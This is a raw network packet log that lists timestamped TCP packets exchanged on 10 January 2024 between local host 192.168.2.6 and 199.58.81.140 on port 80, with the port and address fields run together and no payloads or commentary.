            Jan 10, 2024 15:41:31.230727911 CET4975680192.168.2.6199.58.81.140
            Jan 10, 2024 15:41:31.230739117 CET8049756199.58.81.140192.168.2.6
            Jan 10, 2024 15:41:31.230777979 CET4975680192.168.2.6199.58.81.140
            Jan 10, 2024 15:41:31.230797052 CET8049756199.58.81.140192.168.2.6
            Jan 10, 2024 15:41:31.230907917 CET8049756199.58.81.140192.168.2.6
            Jan 10, 2024 15:41:31.230947018 CET4975680192.168.2.6199.58.81.140
            Jan 10, 2024 15:41:31.230953932 CET8049756199.58.81.140192.168.2.6
            Jan 10, 2024 15:41:31.231038094 CET8049756199.58.81.140192.168.2.6
            Jan 10, 2024 15:41:31.231076956 CET4975680192.168.2.6199.58.81.140
            Jan 10, 2024 15:41:31.231093884 CET8049756199.58.81.140192.168.2.6
            Jan 10, 2024 15:41:31.231129885 CET4975680192.168.2.6199.58.81.140
            Jan 10, 2024 15:41:31.231172085 CET8049756199.58.81.140192.168.2.6
            Jan 10, 2024 15:41:31.231201887 CET8049756199.58.81.140192.168.2.6
            Jan 10, 2024 15:41:31.231237888 CET4975680192.168.2.6199.58.81.140
            Jan 10, 2024 15:41:31.231266975 CET8049756199.58.81.140192.168.2.6
            Jan 10, 2024 15:41:31.231322050 CET8049756199.58.81.140192.168.2.6
            Jan 10, 2024 15:41:31.231359005 CET4975680192.168.2.6199.58.81.140
            Jan 10, 2024 15:41:31.231375933 CET8049756199.58.81.140192.168.2.6
            Jan 10, 2024 15:41:31.231412888 CET4975680192.168.2.6199.58.81.140
            Jan 10, 2024 15:41:31.231424093 CET8049756199.58.81.140192.168.2.6
            Jan 10, 2024 15:41:31.231585026 CET8049756199.58.81.140192.168.2.6
            Jan 10, 2024 15:41:31.231623888 CET4975680192.168.2.6199.58.81.140
            Jan 10, 2024 15:41:31.231642008 CET8049756199.58.81.140192.168.2.6
            Jan 10, 2024 15:41:31.231708050 CET8049756199.58.81.140192.168.2.6
            Jan 10, 2024 15:41:31.231744051 CET4975680192.168.2.6199.58.81.140
            Jan 10, 2024 15:41:31.231836081 CET8049756199.58.81.140192.168.2.6
            Jan 10, 2024 15:41:31.231956959 CET8049756199.58.81.140192.168.2.6
            Jan 10, 2024 15:41:31.231997013 CET4975680192.168.2.6199.58.81.140
            Jan 10, 2024 15:41:31.232037067 CET8049756199.58.81.140192.168.2.6
            Jan 10, 2024 15:41:31.232072115 CET4975680192.168.2.6199.58.81.140
            Jan 10, 2024 15:41:31.232131958 CET8049756199.58.81.140192.168.2.6
            Jan 10, 2024 15:41:31.232302904 CET8049756199.58.81.140192.168.2.6
            Jan 10, 2024 15:41:31.232345104 CET4975680192.168.2.6199.58.81.140
            Jan 10, 2024 15:41:31.232404947 CET8049756199.58.81.140192.168.2.6
            Jan 10, 2024 15:41:31.232467890 CET8049756199.58.81.140192.168.2.6
            Jan 10, 2024 15:41:31.232506990 CET4975680192.168.2.6199.58.81.140
            Jan 10, 2024 15:41:31.232544899 CET8049756199.58.81.140192.168.2.6
            Jan 10, 2024 15:41:31.232582092 CET4975680192.168.2.6199.58.81.140
            Jan 10, 2024 15:41:31.232621908 CET8049756199.58.81.140192.168.2.6
            Jan 10, 2024 15:41:31.232703924 CET8049756199.58.81.140192.168.2.6
            Jan 10, 2024 15:41:31.232749939 CET4975680192.168.2.6199.58.81.140
            Jan 10, 2024 15:41:31.232801914 CET8049756199.58.81.140192.168.2.6
            Jan 10, 2024 15:41:31.232853889 CET8049756199.58.81.140192.168.2.6
            Jan 10, 2024 15:41:31.232897043 CET4975680192.168.2.6199.58.81.140
            Jan 10, 2024 15:41:31.232943058 CET8049756199.58.81.140192.168.2.6
            Jan 10, 2024 15:41:31.232980013 CET4975680192.168.2.6199.58.81.140
            Jan 10, 2024 15:41:31.233027935 CET8049756199.58.81.140192.168.2.6
            Jan 10, 2024 15:41:31.233088970 CET8049756199.58.81.140192.168.2.6
            Jan 10, 2024 15:41:31.233124971 CET4975680192.168.2.6199.58.81.140
            Jan 10, 2024 15:41:31.233237982 CET8049756199.58.81.140192.168.2.6
            Jan 10, 2024 15:41:31.233282089 CET4975680192.168.2.6199.58.81.140
            Jan 10, 2024 15:41:31.233338118 CET8049756199.58.81.140192.168.2.6
            Jan 10, 2024 15:41:31.233377934 CET4975680192.168.2.6199.58.81.140
            Jan 10, 2024 15:41:31.236815929 CET8049756199.58.81.140192.168.2.6
            Jan 10, 2024 15:41:31.236865044 CET4975680192.168.2.6199.58.81.140
            Jan 10, 2024 15:41:31.236900091 CET8049756199.58.81.140192.168.2.6
            Jan 10, 2024 15:41:31.236949921 CET8049756199.58.81.140192.168.2.6
            Jan 10, 2024 15:41:31.236989021 CET4975680192.168.2.6199.58.81.140
            Jan 10, 2024 15:41:31.237019062 CET8049756199.58.81.140192.168.2.6
            Jan 10, 2024 15:41:31.237052917 CET4975680192.168.2.6199.58.81.140
            Jan 10, 2024 15:41:31.237060070 CET8049756199.58.81.140192.168.2.6
            Jan 10, 2024 15:41:31.237104893 CET8049756199.58.81.140192.168.2.6
            Jan 10, 2024 15:41:31.237112999 CET4975680192.168.2.6199.58.81.140
            Jan 10, 2024 15:41:31.237139940 CET4975680192.168.2.6199.58.81.140
            Jan 10, 2024 15:41:31.237186909 CET8049756199.58.81.140192.168.2.6
            Jan 10, 2024 15:41:31.237221956 CET4975680192.168.2.6199.58.81.140
            Jan 10, 2024 15:41:31.237234116 CET8049756199.58.81.140192.168.2.6
            Jan 10, 2024 15:41:31.237267971 CET4975680192.168.2.6199.58.81.140
            Jan 10, 2024 15:41:31.237286091 CET8049756199.58.81.140192.168.2.6
            Jan 10, 2024 15:41:31.237344027 CET8049756199.58.81.140192.168.2.6
            Jan 10, 2024 15:41:31.237420082 CET8049756199.58.81.140192.168.2.6
            Jan 10, 2024 15:41:31.237440109 CET4975680192.168.2.6199.58.81.140
            Jan 10, 2024 15:41:31.237440109 CET4975680192.168.2.6199.58.81.140
            Jan 10, 2024 15:41:31.237457037 CET4975680192.168.2.6199.58.81.140
            Jan 10, 2024 15:41:31.237867117 CET8049756199.58.81.140192.168.2.6
            Jan 10, 2024 15:41:31.237907887 CET4975680192.168.2.6199.58.81.140
            Jan 10, 2024 15:41:31.237984896 CET8049756199.58.81.140192.168.2.6
            Jan 10, 2024 15:41:31.238121986 CET8049756199.58.81.140192.168.2.6
            Jan 10, 2024 15:41:31.238231897 CET4975680192.168.2.6199.58.81.140
            Jan 10, 2024 15:41:31.342376947 CET8049756199.58.81.140192.168.2.6
            Jan 10, 2024 15:41:31.342392921 CET8049756199.58.81.140192.168.2.6
            Jan 10, 2024 15:41:31.342443943 CET8049756199.58.81.140192.168.2.6
            Jan 10, 2024 15:41:31.342458010 CET8049756199.58.81.140192.168.2.6
            Jan 10, 2024 15:41:31.342470884 CET8049756199.58.81.140192.168.2.6
            Jan 10, 2024 15:41:31.342469931 CET4975680192.168.2.6199.58.81.140
            Jan 10, 2024 15:41:31.342485905 CET8049756199.58.81.140192.168.2.6
            Jan 10, 2024 15:41:31.342499971 CET8049756199.58.81.140192.168.2.6
            Jan 10, 2024 15:41:31.342514038 CET8049756199.58.81.140192.168.2.6
            Jan 10, 2024 15:41:31.342525959 CET8049756199.58.81.140192.168.2.6
            Jan 10, 2024 15:41:31.342539072 CET8049756199.58.81.140192.168.2.6
            Jan 10, 2024 15:41:31.342552900 CET8049756199.58.81.140192.168.2.6
            Jan 10, 2024 15:41:31.342566967 CET8049756199.58.81.140192.168.2.6
            Jan 10, 2024 15:41:31.342619896 CET8049756199.58.81.140192.168.2.6
            Jan 10, 2024 15:41:31.342633963 CET8049756199.58.81.140192.168.2.6
            Jan 10, 2024 15:41:31.342645884 CET8049756199.58.81.140192.168.2.6
            Jan 10, 2024 15:41:31.342650890 CET4975680192.168.2.6199.58.81.140
            Jan 10, 2024 15:41:31.342650890 CET4975680192.168.2.6199.58.81.140
            Jan 10, 2024 15:41:31.342650890 CET4975680192.168.2.6199.58.81.140
            Jan 10, 2024 15:41:31.342650890 CET4975680192.168.2.6199.58.81.140
            Jan 10, 2024 15:41:31.342650890 CET4975680192.168.2.6199.58.81.140
            Jan 10, 2024 15:41:31.342650890 CET4975680192.168.2.6199.58.81.140
            Jan 10, 2024 15:41:31.342660904 CET8049756199.58.81.140192.168.2.6
            Jan 10, 2024 15:41:31.342669010 CET4975680192.168.2.6199.58.81.140
            Jan 10, 2024 15:41:31.342678070 CET8049756199.58.81.140192.168.2.6
            Jan 10, 2024 15:41:31.342694044 CET4975680192.168.2.6199.58.81.140
            Jan 10, 2024 15:41:31.342713118 CET4975680192.168.2.6199.58.81.140
            Jan 10, 2024 15:41:31.342762947 CET8049756199.58.81.140192.168.2.6
            Jan 10, 2024 15:41:31.342776060 CET8049756199.58.81.140192.168.2.6
            Jan 10, 2024 15:41:31.342801094 CET4975680192.168.2.6199.58.81.140
            Jan 10, 2024 15:41:31.342813969 CET4975680192.168.2.6199.58.81.140
            Jan 10, 2024 15:41:31.342947006 CET8049756199.58.81.140192.168.2.6
            Jan 10, 2024 15:41:31.342959881 CET8049756199.58.81.140192.168.2.6
            Jan 10, 2024 15:41:31.342993975 CET4975680192.168.2.6199.58.81.140
            Jan 10, 2024 15:41:31.343144894 CET8049756199.58.81.140192.168.2.6
            Jan 10, 2024 15:41:31.343158960 CET8049756199.58.81.140192.168.2.6
            Jan 10, 2024 15:41:31.343170881 CET8049756199.58.81.140192.168.2.6
            Jan 10, 2024 15:41:31.343194962 CET4975680192.168.2.6199.58.81.140
            Jan 10, 2024 15:41:31.343208075 CET4975680192.168.2.6199.58.81.140
            Jan 10, 2024 15:41:31.343317986 CET8049756199.58.81.140192.168.2.6
            Jan 10, 2024 15:41:31.343333960 CET8049756199.58.81.140192.168.2.6
            Jan 10, 2024 15:41:31.343369007 CET4975680192.168.2.6199.58.81.140
            Jan 10, 2024 15:41:31.343439102 CET4975680192.168.2.6199.58.81.140
            Jan 10, 2024 15:41:31.343487978 CET8049756199.58.81.140192.168.2.6
            Jan 10, 2024 15:41:31.343527079 CET4975680192.168.2.6199.58.81.140
            Jan 10, 2024 15:41:31.343688965 CET8049756199.58.81.140192.168.2.6
            Jan 10, 2024 15:41:31.343744993 CET4975680192.168.2.6199.58.81.140
            Jan 10, 2024 15:41:31.343837023 CET8049756199.58.81.140192.168.2.6
            Jan 10, 2024 15:41:31.343851089 CET8049756199.58.81.140192.168.2.6
            Jan 10, 2024 15:41:31.343873024 CET4975680192.168.2.6199.58.81.140
            Jan 10, 2024 15:41:31.343888044 CET4975680192.168.2.6199.58.81.140
            Jan 10, 2024 15:41:31.343904972 CET8049756199.58.81.140192.168.2.6
            Jan 10, 2024 15:41:31.344048023 CET8049756199.58.81.140192.168.2.6
            Jan 10, 2024 15:41:31.344088078 CET4975680192.168.2.6199.58.81.140
            Jan 10, 2024 15:41:31.344296932 CET8049756199.58.81.140192.168.2.6
            Jan 10, 2024 15:41:31.344310045 CET8049756199.58.81.140192.168.2.6
            Jan 10, 2024 15:41:31.344322920 CET8049756199.58.81.140192.168.2.6
            Jan 10, 2024 15:41:31.344356060 CET4975680192.168.2.6199.58.81.140
            Jan 10, 2024 15:41:31.344367981 CET4975680192.168.2.6199.58.81.140
            Jan 10, 2024 15:41:31.344418049 CET8049756199.58.81.140192.168.2.6
            Jan 10, 2024 15:41:31.344430923 CET8049756199.58.81.140192.168.2.6
            Jan 10, 2024 15:41:31.344475031 CET4975680192.168.2.6199.58.81.140
            Jan 10, 2024 15:41:31.344602108 CET8049756199.58.81.140192.168.2.6
            Jan 10, 2024 15:41:31.344615936 CET8049756199.58.81.140192.168.2.6
            Jan 10, 2024 15:41:31.344640017 CET4975680192.168.2.6199.58.81.140
            Jan 10, 2024 15:41:31.344677925 CET4975680192.168.2.6199.58.81.140
            Jan 10, 2024 15:41:31.344783068 CET8049756199.58.81.140192.168.2.6
            Jan 10, 2024 15:41:31.344935894 CET8049756199.58.81.140192.168.2.6
            Jan 10, 2024 15:41:31.344974041 CET4975680192.168.2.6199.58.81.140
            Jan 10, 2024 15:41:31.345110893 CET8049756199.58.81.140192.168.2.6
            Jan 10, 2024 15:41:31.345125914 CET8049756199.58.81.140192.168.2.6
            Jan 10, 2024 15:41:31.345164061 CET4975680192.168.2.6199.58.81.140
            Jan 10, 2024 15:41:31.345297098 CET8049756199.58.81.140192.168.2.6
            Jan 10, 2024 15:41:31.345335007 CET4975680192.168.2.6199.58.81.140
            Jan 10, 2024 15:41:31.345488071 CET8049756199.58.81.140192.168.2.6
            Jan 10, 2024 15:41:31.345577002 CET4975680192.168.2.6199.58.81.140
            Jan 10, 2024 15:41:31.345643044 CET8049756199.58.81.140192.168.2.6
            Jan 10, 2024 15:41:31.345658064 CET8049756199.58.81.140192.168.2.6
            Jan 10, 2024 15:41:31.345680952 CET4975680192.168.2.6199.58.81.140
            Jan 10, 2024 15:41:31.345695972 CET4975680192.168.2.6199.58.81.140
            Jan 10, 2024 15:41:31.345823050 CET8049756199.58.81.140192.168.2.6
            Jan 10, 2024 15:41:31.346556902 CET8049756199.58.81.140192.168.2.6
            Jan 10, 2024 15:41:31.346600056 CET4975680192.168.2.6199.58.81.140
            Jan 10, 2024 15:41:31.346738100 CET8049756199.58.81.140192.168.2.6
            Jan 10, 2024 15:41:31.346752882 CET8049756199.58.81.140192.168.2.6
            Jan 10, 2024 15:41:31.346793890 CET4975680192.168.2.6199.58.81.140
            Jan 10, 2024 15:41:31.346880913 CET8049756199.58.81.140192.168.2.6
            Jan 10, 2024 15:41:31.346914053 CET4975680192.168.2.6199.58.81.140
            Jan 10, 2024 15:41:31.347053051 CET8049756199.58.81.140192.168.2.6
            Jan 10, 2024 15:41:31.347069025 CET8049756199.58.81.140192.168.2.6
            Jan 10, 2024 15:41:31.347080946 CET8049756199.58.81.140192.168.2.6
            Jan 10, 2024 15:41:31.347106934 CET4975680192.168.2.6199.58.81.140
            Jan 10, 2024 15:41:31.347127914 CET4975680192.168.2.6199.58.81.140
            Jan 10, 2024 15:41:31.347229958 CET8049756199.58.81.140192.168.2.6
            Jan 10, 2024 15:41:31.347244024 CET8049756199.58.81.140192.168.2.6
            Jan 10, 2024 15:41:31.347255945 CET8049756199.58.81.140192.168.2.6
            Jan 10, 2024 15:41:31.347268105 CET8049756199.58.81.140192.168.2.6
            Jan 10, 2024 15:41:31.347279072 CET4975680192.168.2.6199.58.81.140
            Jan 10, 2024 15:41:31.347281933 CET8049756199.58.81.140192.168.2.6
            Jan 10, 2024 15:41:31.347295046 CET8049756199.58.81.140192.168.2.6
            Jan 10, 2024 15:41:31.347306013 CET4975680192.168.2.6199.58.81.140
            Jan 10, 2024 15:41:31.347307920 CET8049756199.58.81.140192.168.2.6
            Jan 10, 2024 15:41:31.347322941 CET8049756199.58.81.140192.168.2.6
            Jan 10, 2024 15:41:31.347327948 CET4975680192.168.2.6199.58.81.140
            Jan 10, 2024 15:41:31.347336054 CET8049756199.58.81.140192.168.2.6
            Jan 10, 2024 15:41:31.347342014 CET4975680192.168.2.6199.58.81.140
            Jan 10, 2024 15:41:31.347349882 CET8049756199.58.81.140192.168.2.6
            Jan 10, 2024 15:41:31.347362041 CET8049756199.58.81.140192.168.2.6
            Jan 10, 2024 15:41:31.347366095 CET4975680192.168.2.6199.58.81.140
            Jan 10, 2024 15:41:31.347376108 CET8049756199.58.81.140192.168.2.6
            Jan 10, 2024 15:41:31.347381115 CET4975680192.168.2.6199.58.81.140
            Jan 10, 2024 15:41:31.347388983 CET8049756199.58.81.140192.168.2.6
            Jan 10, 2024 15:41:31.347402096 CET8049756199.58.81.140192.168.2.6
            Jan 10, 2024 15:41:31.347404003 CET4975680192.168.2.6199.58.81.140
            Jan 10, 2024 15:41:31.347417116 CET8049756199.58.81.140192.168.2.6
            Jan 10, 2024 15:41:31.347429991 CET4975680192.168.2.6199.58.81.140
            Jan 10, 2024 15:41:31.347429991 CET8049756199.58.81.140192.168.2.6
            Jan 10, 2024 15:41:31.347445011 CET8049756199.58.81.140192.168.2.6
            Jan 10, 2024 15:41:31.347457886 CET8049756199.58.81.140192.168.2.6
            Jan 10, 2024 15:41:31.347457886 CET4975680192.168.2.6199.58.81.140
            Jan 10, 2024 15:41:31.347470999 CET4975680192.168.2.6199.58.81.140
            Jan 10, 2024 15:41:31.347470999 CET8049756199.58.81.140192.168.2.6
            Jan 10, 2024 15:41:31.347485065 CET8049756199.58.81.140192.168.2.6
            Jan 10, 2024 15:41:31.347497940 CET8049756199.58.81.140192.168.2.6
            Jan 10, 2024 15:41:31.347501993 CET4975680192.168.2.6199.58.81.140
            Jan 10, 2024 15:41:31.347511053 CET8049756199.58.81.140192.168.2.6
            Jan 10, 2024 15:41:31.347524881 CET8049756199.58.81.140192.168.2.6
            Jan 10, 2024 15:41:31.347531080 CET4975680192.168.2.6199.58.81.140
            Jan 10, 2024 15:41:31.347537041 CET8049756199.58.81.140192.168.2.6
            Jan 10, 2024 15:41:31.347547054 CET4975680192.168.2.6199.58.81.140
            Jan 10, 2024 15:41:31.347553015 CET8049756199.58.81.140192.168.2.6
            Jan 10, 2024 15:41:31.347563982 CET4975680192.168.2.6199.58.81.140
            Jan 10, 2024 15:41:31.347568035 CET8049756199.58.81.140192.168.2.6
            Jan 10, 2024 15:41:31.347580910 CET8049756199.58.81.140192.168.2.6
            Jan 10, 2024 15:41:31.347592115 CET4975680192.168.2.6199.58.81.140
            Jan 10, 2024 15:41:31.347594023 CET8049756199.58.81.140192.168.2.6
            Jan 10, 2024 15:41:31.347606897 CET8049756199.58.81.140192.168.2.6
            Jan 10, 2024 15:41:31.347620010 CET4975680192.168.2.6199.58.81.140
            Jan 10, 2024 15:41:31.347620964 CET8049756199.58.81.140192.168.2.6
            Jan 10, 2024 15:41:31.347635031 CET8049756199.58.81.140192.168.2.6
            Jan 10, 2024 15:41:31.347637892 CET4975680192.168.2.6199.58.81.140
            Jan 10, 2024 15:41:31.347647905 CET8049756199.58.81.140192.168.2.6
            Jan 10, 2024 15:41:31.347661018 CET8049756199.58.81.140192.168.2.6
            Jan 10, 2024 15:41:31.347667933 CET4975680192.168.2.6199.58.81.140
            Jan 10, 2024 15:41:31.347673893 CET8049756199.58.81.140192.168.2.6
            Jan 10, 2024 15:41:31.347687960 CET8049756199.58.81.140192.168.2.6
            Jan 10, 2024 15:41:31.347696066 CET4975680192.168.2.6199.58.81.140
            Jan 10, 2024 15:41:31.347700119 CET8049756199.58.81.140192.168.2.6
            Jan 10, 2024 15:41:31.347709894 CET4975680192.168.2.6199.58.81.140
            Jan 10, 2024 15:41:31.347712040 CET8049756199.58.81.140192.168.2.6
            Jan 10, 2024 15:41:31.347732067 CET8049756199.58.81.140192.168.2.6
            Jan 10, 2024 15:41:31.347735882 CET4975680192.168.2.6199.58.81.140
            Jan 10, 2024 15:41:31.347748995 CET8049756199.58.81.140192.168.2.6
            Jan 10, 2024 15:41:31.347762108 CET4975680192.168.2.6199.58.81.140
            Jan 10, 2024 15:41:31.347762108 CET8049756199.58.81.140192.168.2.6
            Jan 10, 2024 15:41:31.347776890 CET8049756199.58.81.140192.168.2.6
            Jan 10, 2024 15:41:31.347786903 CET4975680192.168.2.6199.58.81.140
            Jan 10, 2024 15:41:31.347790956 CET8049756199.58.81.140192.168.2.6
            Jan 10, 2024 15:41:31.347803116 CET8049756199.58.81.140192.168.2.6
            Jan 10, 2024 15:41:31.347815037 CET4975680192.168.2.6199.58.81.140
            Jan 10, 2024 15:41:31.347816944 CET8049756199.58.81.140192.168.2.6
            Jan 10, 2024 15:41:31.347830057 CET4975680192.168.2.6199.58.81.140
            Jan 10, 2024 15:41:31.347842932 CET8049756199.58.81.140192.168.2.6
            Jan 10, 2024 15:41:31.347853899 CET4975680192.168.2.6199.58.81.140
            Jan 10, 2024 15:41:31.347877026 CET4975680192.168.2.6199.58.81.140
            Jan 10, 2024 15:41:31.347908974 CET8049756199.58.81.140192.168.2.6
            Jan 10, 2024 15:41:31.347944021 CET4975680192.168.2.6199.58.81.140
            Jan 10, 2024 15:41:31.347944975 CET8049756199.58.81.140192.168.2.6
            Jan 10, 2024 15:41:31.347996950 CET4975680192.168.2.6199.58.81.140
            Jan 10, 2024 15:41:31.348053932 CET8049756199.58.81.140192.168.2.6
            Jan 10, 2024 15:41:31.348093033 CET4975680192.168.2.6199.58.81.140
            Jan 10, 2024 15:41:31.348207951 CET8049756199.58.81.140192.168.2.6
            Jan 10, 2024 15:41:31.348246098 CET4975680192.168.2.6199.58.81.140
            Jan 10, 2024 15:41:31.348277092 CET8049756199.58.81.140192.168.2.6
            Jan 10, 2024 15:41:31.348309994 CET8049756199.58.81.140192.168.2.6
            Jan 10, 2024 15:41:31.348330975 CET4975680192.168.2.6199.58.81.140
            Jan 10, 2024 15:41:31.348351002 CET4975680192.168.2.6199.58.81.140
            Jan 10, 2024 15:41:31.348381042 CET8049756199.58.81.140192.168.2.6
            Jan 10, 2024 15:41:31.348417997 CET4975680192.168.2.6199.58.81.140
            Jan 10, 2024 15:41:31.348448038 CET8049756199.58.81.140192.168.2.6
            Jan 10, 2024 15:41:31.348484039 CET4975680192.168.2.6199.58.81.140
            Jan 10, 2024 15:41:31.348535061 CET8049756199.58.81.140192.168.2.6
            Jan 10, 2024 15:41:31.348571062 CET4975680192.168.2.6199.58.81.140
            Jan 10, 2024 15:41:31.348716974 CET8049756199.58.81.140192.168.2.6
            Jan 10, 2024 15:41:31.348753929 CET4975680192.168.2.6199.58.81.140
            Jan 10, 2024 15:41:31.348934889 CET8049756199.58.81.140192.168.2.6
            Jan 10, 2024 15:41:31.348970890 CET8049756199.58.81.140192.168.2.6
            Jan 10, 2024 15:41:31.348974943 CET4975680192.168.2.6199.58.81.140
            Jan 10, 2024 15:41:31.349024057 CET4975680192.168.2.6199.58.81.140
            Jan 10, 2024 15:41:31.349045992 CET8049756199.58.81.140192.168.2.6
            Jan 10, 2024 15:41:31.349093914 CET4975680192.168.2.6199.58.81.140
            Jan 10, 2024 15:41:31.349095106 CET8049756199.58.81.140192.168.2.6
            Jan 10, 2024 15:41:31.349138021 CET4975680192.168.2.6199.58.81.140
            Jan 10, 2024 15:41:31.349270105 CET8049756199.58.81.140192.168.2.6
            Jan 10, 2024 15:41:31.349308014 CET4975680192.168.2.6199.58.81.140
            Jan 10, 2024 15:41:31.349339008 CET8049756199.58.81.140192.168.2.6
            Jan 10, 2024 15:41:31.349368095 CET8049756199.58.81.140192.168.2.6
            Jan 10, 2024 15:41:31.349375010 CET4975680192.168.2.6199.58.81.140
            Jan 10, 2024 15:41:31.349401951 CET4975680192.168.2.6199.58.81.140
            Jan 10, 2024 15:41:31.349469900 CET8049756199.58.81.140192.168.2.6
            Jan 10, 2024 15:41:31.349508047 CET4975680192.168.2.6199.58.81.140
            Jan 10, 2024 15:41:31.349524021 CET8049756199.58.81.140192.168.2.6
            Jan 10, 2024 15:41:31.349558115 CET4975680192.168.2.6199.58.81.140
            Jan 10, 2024 15:41:31.349589109 CET8049756199.58.81.140192.168.2.6
            Jan 10, 2024 15:41:31.349625111 CET4975680192.168.2.6199.58.81.140
            Jan 10, 2024 15:41:31.349656105 CET8049756199.58.81.140192.168.2.6
            Jan 10, 2024 15:41:31.349692106 CET4975680192.168.2.6199.58.81.140
            Jan 10, 2024 15:41:31.349781036 CET8049756199.58.81.140192.168.2.6
            Jan 10, 2024 15:41:31.349817991 CET4975680192.168.2.6199.58.81.140
            Jan 10, 2024 15:41:31.349834919 CET8049756199.58.81.140192.168.2.6
            Jan 10, 2024 15:41:31.349872112 CET4975680192.168.2.6199.58.81.140
            Jan 10, 2024 15:41:31.349968910 CET8049756199.58.81.140192.168.2.6
            Jan 10, 2024 15:41:31.350008011 CET4975680192.168.2.6199.58.81.140
            Jan 10, 2024 15:41:31.350060940 CET8049756199.58.81.140192.168.2.6
            Jan 10, 2024 15:41:31.350101948 CET4975680192.168.2.6199.58.81.140
            Jan 10, 2024 15:41:31.350131989 CET8049756199.58.81.140192.168.2.6
            Jan 10, 2024 15:41:31.350168943 CET4975680192.168.2.6199.58.81.140
            Jan 10, 2024 15:41:31.350184917 CET8049756199.58.81.140192.168.2.6
            Jan 10, 2024 15:41:31.350219011 CET4975680192.168.2.6199.58.81.140
            Jan 10, 2024 15:41:31.350250006 CET8049756199.58.81.140192.168.2.6
            Jan 10, 2024 15:41:31.350287914 CET4975680192.168.2.6199.58.81.140
            Jan 10, 2024 15:41:31.350366116 CET8049756199.58.81.140192.168.2.6
            Jan 10, 2024 15:41:31.350402117 CET4975680192.168.2.6199.58.81.140
            Jan 10, 2024 15:41:31.350436926 CET8049756199.58.81.140192.168.2.6
            Jan 10, 2024 15:41:31.350474119 CET4975680192.168.2.6199.58.81.140
            Jan 10, 2024 15:41:31.351078033 CET8049756199.58.81.140192.168.2.6
            Jan 10, 2024 15:41:31.351120949 CET4975680192.168.2.6199.58.81.140
            Jan 10, 2024 15:41:31.351150990 CET8049756199.58.81.140192.168.2.6
            Jan 10, 2024 15:41:31.351288080 CET8049756199.58.81.140192.168.2.6
            Jan 10, 2024 15:41:31.351325989 CET4975680192.168.2.6199.58.81.140
            Jan 10, 2024 15:41:31.351356983 CET8049756199.58.81.140192.168.2.6
            Jan 10, 2024 15:41:31.351399899 CET8049756199.58.81.140192.168.2.6
            Jan 10, 2024 15:41:31.351437092 CET4975680192.168.2.6199.58.81.140
            Jan 10, 2024 15:41:31.351465940 CET8049756199.58.81.140192.168.2.6
            Jan 10, 2024 15:41:31.351500034 CET4975680192.168.2.6199.58.81.140
            Jan 10, 2024 15:41:31.351520061 CET8049756199.58.81.140192.168.2.6
            Jan 10, 2024 15:41:31.351582050 CET8049756199.58.81.140192.168.2.6
            Jan 10, 2024 15:41:31.351615906 CET4975680192.168.2.6199.58.81.140
            Jan 10, 2024 15:41:31.351634026 CET8049756199.58.81.140192.168.2.6
            Jan 10, 2024 15:41:31.351682901 CET8049756199.58.81.140192.168.2.6
            Jan 10, 2024 15:41:31.351721048 CET4975680192.168.2.6199.58.81.140
            Jan 10, 2024 15:41:31.351761103 CET8049756199.58.81.140192.168.2.6
            Jan 10, 2024 15:41:31.351798058 CET4975680192.168.2.6199.58.81.140
            Jan 10, 2024 15:41:31.352387905 CET8049756199.58.81.140192.168.2.6
            Jan 10, 2024 15:41:31.352432966 CET8049756199.58.81.140192.168.2.6
            Jan 10, 2024 15:41:31.352475882 CET4975680192.168.2.6199.58.81.140
            Jan 10, 2024 15:41:31.352507114 CET8049756199.58.81.140192.168.2.6
            Jan 10, 2024 15:41:31.352579117 CET8049756199.58.81.140192.168.2.6
            Jan 10, 2024 15:41:31.352617979 CET4975680192.168.2.6199.58.81.140
            Jan 10, 2024 15:41:31.352617979 CET8049756199.58.81.140192.168.2.6
            Jan 10, 2024 15:41:31.352662086 CET8049756199.58.81.140192.168.2.6
            Jan 10, 2024 15:41:31.352682114 CET4975680192.168.2.6199.58.81.140
            Jan 10, 2024 15:41:31.352778912 CET8049756199.58.81.140192.168.2.6
            Jan 10, 2024 15:41:31.352826118 CET4975680192.168.2.6199.58.81.140
            Jan 10, 2024 15:41:31.355019093 CET8049756199.58.81.140192.168.2.6
            Jan 10, 2024 15:41:31.355201960 CET8049756199.58.81.140192.168.2.6
            Jan 10, 2024 15:41:31.355256081 CET4975680192.168.2.6199.58.81.140
            Jan 10, 2024 15:41:31.355560064 CET8049756199.58.81.140192.168.2.6
            Jan 10, 2024 15:41:31.355632067 CET8049756199.58.81.140192.168.2.6
            Jan 10, 2024 15:41:31.355671883 CET4975680192.168.2.6199.58.81.140
            Jan 10, 2024 15:41:31.355803013 CET8049756199.58.81.140192.168.2.6
            Jan 10, 2024 15:41:31.355896950 CET8049756199.58.81.140192.168.2.6
            Jan 10, 2024 15:41:31.355954885 CET4975680192.168.2.6199.58.81.140
            Jan 10, 2024 15:41:31.355986118 CET8049756199.58.81.140192.168.2.6
            Jan 10, 2024 15:41:31.356023073 CET4975680192.168.2.6199.58.81.140
            Jan 10, 2024 15:41:31.356070995 CET8049756199.58.81.140192.168.2.6
            Jan 10, 2024 15:41:31.356142044 CET8049756199.58.81.140192.168.2.6
            Jan 10, 2024 15:41:31.356179953 CET4975680192.168.2.6199.58.81.140
            Jan 10, 2024 15:41:31.356251001 CET8049756199.58.81.140192.168.2.6
            Jan 10, 2024 15:41:31.357577085 CET4975680192.168.2.6199.58.81.140
            Jan 10, 2024 15:41:31.450378895 CET8049756199.58.81.140192.168.2.6
            Jan 10, 2024 15:41:31.450726032 CET8049756199.58.81.140192.168.2.6
            Jan 10, 2024 15:41:31.450742960 CET8049756199.58.81.140192.168.2.6
            Jan 10, 2024 15:41:31.450757027 CET8049756199.58.81.140192.168.2.6
            Jan 10, 2024 15:41:31.450804949 CET8049756199.58.81.140192.168.2.6
            Jan 10, 2024 15:41:31.450808048 CET4975680192.168.2.6199.58.81.140
            Jan 10, 2024 15:41:31.450848103 CET4975680192.168.2.6199.58.81.140
            Jan 10, 2024 15:41:31.450944901 CET8049756199.58.81.140192.168.2.6
            Jan 10, 2024 15:41:31.450995922 CET4975680192.168.2.6199.58.81.140
            Jan 10, 2024 15:41:31.451086998 CET8049756199.58.81.140192.168.2.6
            Jan 10, 2024 15:41:31.451145887 CET8049756199.58.81.140192.168.2.6
            Jan 10, 2024 15:41:31.451191902 CET4975680192.168.2.6199.58.81.140
            Jan 10, 2024 15:41:31.451196909 CET8049756199.58.81.140192.168.2.6
            Jan 10, 2024 15:41:31.451241016 CET8049756199.58.81.140192.168.2.6
            Jan 10, 2024 15:41:31.451282978 CET4975680192.168.2.6199.58.81.140
            Jan 10, 2024 15:41:31.451299906 CET8049756199.58.81.140192.168.2.6
